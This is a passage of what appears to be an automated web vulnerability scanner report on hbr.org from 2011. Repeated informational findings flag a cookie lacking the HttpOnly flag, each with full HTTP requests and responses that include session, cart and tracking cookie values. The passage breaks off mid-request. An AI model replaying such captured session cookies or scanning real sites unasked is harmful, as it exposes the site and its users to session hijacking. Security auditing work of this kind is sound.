4.2. http://hbr.org/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/extended_classes.xcss/DATB/eAFjizhSBAADHgGV
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/extended_classes.xcss/DATB/eAFjizhSBAADHgGV
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/extended_classes.xcss/DATB/eAFjizhSBAADHgGV HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Last-Modified: Tue, 08 Nov 2011 13:08:44 GMT Cache-control: max-age=86400 Expires: Thu, 10 Nov 2011 14:09:18 GMT Content-Type: text/css;charset=ISO-8859-1 LEG: 5 Vary: Accept-Encoding Content-Length: 2873 .rich-container input,.rich-input,.rich-container select,.rich-select,.rich-container textarea,.rich-textarea,.rich-container button,.rich-button,.rich-container keygen,.rich-keygen,.rich-container is...[SNIP]...
4.3. http://hbr.org/hbrg-main/resources/css/jquery-ui-1.8.10.custom.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/jquery-ui-1.8.10.custom.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/jquery-ui-1.8.10.custom.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "61182-8490-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 33936 Content-Type: text/css /* * jQuery UI CSS Framework 1.8.10 * * Copyright 2011, AUTHORS.txt (http://jqueryui.com/about) * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * http://d...[SNIP]...
4.4. http://hbr.org/hbrg-main/resources/css/marketing/baynote.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/marketing/baynote.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/marketing/baynote.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/style.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:24 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "3eb37a-fe5-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:24 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 4069 Content-Type: text/css /* Begin Baynote */ /* Begin Baynote Global */ .bn_g_welcome { color:#231f20; font-size:12px; font-weight:bold; letter-spacing:0.05em; margin-bottom:10px; text-transform:uppercase; } .bn_g_resu...[SNIP]...
4.5. http://hbr.org/hbrg-main/resources/css/marketing/jquery.fancybox-1.3.1.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/marketing/jquery.fancybox-1.3.1.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/marketing/jquery.fancybox-1.3.1.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:30 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "3eb37c-27b2-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:30 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 10162 Content-Type: text/css /* * FancyBox - jQuery Plugin * Simple and fancy lightbox alternative * * Examples and documentation at: http://fancybox.net * * Copyright (c) 2008 - 2010 Janis Skarnelis * * Version:...[SNIP]...
4.6. http://hbr.org/hbrg-main/resources/css/reset.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/reset.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/reset.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/style.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:24 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "61188-1cf-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:24 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 463 Content-Type: text/css body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td {margin:0; padding:0;} table {border-collapse:collapse; border-spacing:0;} fieldset,img {border:0;}...[SNIP]...
4.7. http://hbr.org/hbrg-main/resources/css/stay_connected.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/stay_connected.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/stay_connected.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/style.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:18:03 GMT ETag: "61186-687-4a88871aca0c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 1671 Content-Type: text/css .../* Begin Stay Connected */ #stay_connected { border:10px solid #bdbcbc; font-family:Arial, Helvetica, sans-serif; margin:0 0 25px 10px; text-align:center; width:280px; } #stay_connected a { col...[SNIP]...
4.8. http://hbr.org/hbrg-main/resources/css/style.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/css/style.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/css/style.css HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT Server: Apache Last-Modified: Mon, 24 Oct 2011 17:02:51 GMT ETag: "5f933-211d5-4b00e649ec4c0" Accept-Ranges: bytes Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:18 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 135637 Content-Type: text/css @import url("reset.css"); @import url("stay_connected.css"); /*------- THIRD PARTY CSS ---------*/ @import url("/hbrg-main/resources/css/marketing/baynote.css"); /*----------- BEGIN GLOBAL --------...[SNIP]...
4.9. http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/html/marketing/partner_center.html
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/html/marketing/partner_center.html HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:37 GMT Server: Apache Last-Modified: Wed, 24 Aug 2011 17:55:35 GMT Accept-Ranges: bytes Cache-Control: max-age=7200, proxy-revalidate Expires: Wed, 09 Nov 2011 16:09:37 GMT Vary: Accept-Encoding LEG: 5 Content-Length: 3326 Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html> <head> <style type="text/css"> @import url("/hbrg-main/resources/...[SNIP]...
4.10. http://hbr.org/hbrg-main/resources/images/favicon.ico
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/favicon.ico
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/favicon.ico HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:15 GMT ETag: "67ec0-57e-4a888798ac9c0" Accept-Ranges: bytes Content-Length: 1406 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT LEG: 5 Content-Type: text/plain; charset=UTF-8 ..............h.......(....... ...............................q\......>!...................v......!........................................................................................................[SNIP]...
4.11. http://hbr.org/hbrg-main/resources/images/generic_product_images/case_study_100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/generic_product_images/case_study_100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/generic_product_images/case_study_100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:26 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:15 GMT ETag: "81513-814-4a888798ac9c0" Accept-Ranges: bytes Content-Length: 2068 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:26 GMT LEG: 5 Content-Type: image/gif GIF89ad......***DEF.Y[.<A....uu....JN.gh.||.CH.-4.QU.5;.&....$&'....no.`b...rtt......cde......466......SUU..............'..................................................................................[SNIP]...
4.12. http://hbr.org/hbrg-main/resources/images/hbrPrintLogo.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/hbrPrintLogo.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/hbrPrintLogo.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:25 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:16 GMT ETag: "67eca-d52-4a888799a0c00" Accept-Ranges: bytes Content-Length: 3410 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:25 GMT LEG: 5 Content-Type: image/gif GIF89a..C....pmn0--MJK.................................?<=ZWX.........{yy..............."..fcd......#. ......!.......,......C.....'.di.h..l..p|.tm.x..5O....ti...V..l:..h.Q2\&...c f...x..t...k m..TR..n...[SNIP]...
4.13. http://hbr.org/hbrg-main/resources/images/marketing/baynote/bnCustomersWhoViewedBack.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/baynote/bnCustomersWhoViewedBack.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/baynote/bnCustomersWhoViewedBack.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/marketing/baynote.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:41 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:17 GMT ETag: "18e139-43-4a88879a94e40" Accept-Ranges: bytes Content-Length: 67 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:41 GMT LEG: 5 Content-Type: image/gif GIF89aC............!.......,....C......D................".....*S..;
4.14. http://hbr.org/hbrg-main/resources/images/marketing/houseads/HBR_On_Sept2011_300x100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/houseads/HBR_On_Sept2011_300x100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/houseads/HBR_On_Sept2011_300x100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:38 GMT Server: Apache Last-Modified: Tue, 27 Sep 2011 19:03:42 GMT ETag: "f074c-2be5-4adf0ef191f80" Accept-Ranges: bytes Content-Length: 11237 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:38 GMT LEG: 5 Content-Type: image/gif GIF89a,.d....EEE...........zg......@+222.5%................L4.P6z..Mqs..........[Q....l....:'...z,..........wwwZ|}......UxyEkmPtufee...........................Y{|......\}~.]D....H1....5.....t_.hR<deS...[SNIP]...
4.15. http://hbr.org/hbrg-main/resources/images/marketing/houseads/HBRspotlight_10470_300x100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/houseads/HBRspotlight_10470_300x100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/houseads/HBRspotlight_10470_300x100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; 